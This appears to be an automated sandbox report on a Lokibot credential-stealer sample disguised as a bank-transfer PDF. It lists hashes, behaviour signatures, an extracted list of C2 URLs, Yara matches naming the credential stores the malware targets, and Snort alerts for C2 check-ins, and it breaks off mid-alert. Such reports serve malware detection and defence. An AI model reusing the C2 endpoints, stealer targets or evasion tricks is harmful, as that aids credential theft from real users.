Edit tour

Windows Analysis Report
transferencia bancaria.pdf.exe

Overview

General Information

Sample Name:	transferencia bancaria.pdf.exe
Analysis ID:	736955
MD5:	355efb2e1f7dd361f8e7cda449a45eac
SHA1:	864f8d367c72d37347e2dc8fa799cc9a2550d66c
SHA256:	cb90ea9b90ccb675d555891bcbfb224edf1bbfe7a650e9600508c93660ec09eb
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Lokibot

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Uses an obfuscated file name to hide its real file extension (double extension)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

transferencia bancaria.pdf.exe (PID: 1100 cmdline: C:\Users\user\Desktop\transferencia bancaria.pdf.exe MD5: 355EFB2E1F7DD361F8E7CDA449A45EAC)

transferencia bancaria.pdf.exe (PID: 5228 cmdline: C:\Users\user\Desktop\transferencia bancaria.pdf.exe MD5: 355EFB2E1F7DD361F8E7CDA449A45EAC)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gl21/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x50f24:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3e2e3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x4cb27:$des3: 68 03 66 00 00 0x50f24:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x50ff0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17c80:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x504b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1388f:$des3: 68 03 66 00 00 0x17c80:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d4c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ca0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x506b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x138af:$des3: 68 03 66 00 00 0x17ca0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d6c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: transferencia bancaria.pdf.exe PID: 1100	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: transferencia bancaria.pdf.exe PID: 1100	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: transferencia bancaria.pdf.exe PID: 1100	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: transferencia bancaria.pdf.exe PID: 1100	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x10021:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1b7c3:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x92d62:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: transferencia bancaria.pdf.exe PID: 5228	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: transferencia bancaria.pdf.exe PID: 5228	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: transferencia bancaria.pdf.exe PID: 5228	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: transferencia bancaria.pdf.exe PID: 5228	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6cbd:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x369f8:$s1: http:// 0x3a1b3:$s1: http:// 0x3ac0c:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x36a00:$s2: https:// 0x369f8:$f1: http:// 0x3a1b3:$f1: http:// 0x36a00:$f2: https://
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x390b6:$f1: FileZilla\recentservers.xml 0x390f6:$f2: FileZilla\sitemanager.xml 0x37366:$b2: Mozilla\Firefox\Profiles 0x370d0:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3727a:$s4: logins.json 0x38124:$s6: wand.dat 0x36ba4:$a1: username_value 0x36b94:$a2: password_value 0x371df:$a3: encryptedUsername 0x3724c:$a3: encryptedUsername 0x371f2:$a4: encryptedPassword 0x37260:$a4: encryptedPassword
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0xc2a6:$v1: SbieDll.dll 0xc2c0:$v2: USER 0xc2cc:$v3: SANDBOX 0xc2de:$v4: VIRUS 0xc32e:$v4: VIRUS 0xc2ec:$v5: MALWARE 0xc2fe:$v6: SCHMIDTI 0xc312:$v7: CURRENTUSER
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x39f70:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2732f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x36934:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x36b7c:$a2: last_compatible_version
0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x35b73:$des3: 68 03 66 00 00 0x39f70:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x3a03c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 45 entries

Snort Signatures

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549712802024318 11/03/22-12:30:22.162497
SID:	2024318
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549727802024313 11/03/22-12:31:01.987085
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549723802825766 11/03/22-12:30:53.367985
SID:	2825766
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549724802021641 11/03/22-12:30:54.913991
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859881532014169 11/03/22-12:31:01.170102
SID:	2014169
Source Port:	59881
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856122532014169 11/03/22-12:30:45.704907
SID:	2014169
Source Port:	56122
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549741802825766 11/03/22-12:31:39.946873
SID:	2825766
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549745802024313 11/03/22-12:31:50.569101
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549728802025381 11/03/22-12:31:03.903902
SID:	2025381
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549739802021641 11/03/22-12:31:35.606377
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549738802825766 11/03/22-12:31:33.019427
SID:	2825766
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549713802025381 11/03/22-12:30:25.414440
SID:	2025381
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549731802025381 11/03/22-12:31:09.511791
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549737802024318 11/03/22-12:31:31.046497
SID:	2024318
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549713802825766 11/03/22-12:30:25.414440
SID:	2825766
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497182025483 11/03/22-12:30:41.067853
SID:	2025483
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497092025483 11/03/22-12:30:17.656419
SID:	2025483
Source Port:	80
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850343532014169 11/03/22-12:31:05.602892
SID:	2014169
Source Port:	50343
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549717802024318 11/03/22-12:30:35.019960
SID:	2024318
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549717802024313 11/03/22-12:30:35.019960
SID:	2024313
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856569532014169 11/03/22-12:31:22.519121
SID:	2014169
Source Port:	56569
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497122025483 11/03/22-12:30:23.556931
SID:	2025483
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549729802021641 11/03/22-12:31:05.707382
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549742802021641 11/03/22-12:31:41.893270
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
